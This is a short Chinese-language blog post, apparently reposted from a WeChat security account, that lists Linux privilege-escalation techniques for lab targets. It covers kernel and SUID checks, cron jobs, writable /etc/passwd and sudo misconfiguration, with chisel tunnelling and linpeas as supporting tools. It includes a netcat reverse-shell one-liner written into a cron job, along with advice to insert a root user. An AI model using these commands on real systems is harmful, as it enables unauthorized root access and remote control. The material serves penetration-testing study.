Linux提权套路

admin 2024年7月17日12:58:22评论14 views字数 962阅读3分12秒阅读模式

 提权总结

Linux提权套路

看到了,关注一下不吃亏啊,点个赞转发一下啦,WP看不下去的,可以B站搜:标松君,UP主录的打靶视频,欢迎关注。顺便宣传一下星球:重生者安全, 里面每天会不定期更新OSCP知识点,车联网渗透红队以及漏洞挖掘工具等信息分享,欢迎加入;以及想挖SRC逻辑漏洞的朋友,可以私聊。

01

提权思路

1.内核提权:查看系统内核版本后,根据版本号查找CVE提取常用命令cat /etc/issuecat /etc/os-releaseuname -a2.SUID提取常用命令和网站:find / -perm -u=s -type f 2>/dev/nullhttps://gtfobins.github.io/3.计划任务提权写入计划任务的反弹shellecho "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f"常用工具:https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy644.查找ROOT权限文件并且其他用户有写入的权限:find / -user root -type f -perm -o=rw -ls 2>/dev/null | grep -v "/proc"比如/etc/passwd有权限写入,可以直接写入一个root用户进行提权5.sudo错误配置提权常用命令:sudo -l6.注意靶机只对本地开放的端口,比如127.0.0.18000或者127.0.0.18080这个时候需要我们去把靶机本地的端口转发到kali上面:可以使用chisel工具进行转发:kali上./chisel_kali server -p 8000 --reverse 靶机上:./chisel client 192.168.32.173:8000 R:8001:127.0.0.1:8000#这是将靶机的8000端口转发到kali的8001端口,这样直接访问kali的8001就可以了7.常用自动化工具linpeas提权脚本:https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

原文始发于微信公众号(道玄网安驿站):Linux提权套路

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月17日12:58:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Linux提权套路https://cn-sec.com/archives/2956522.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息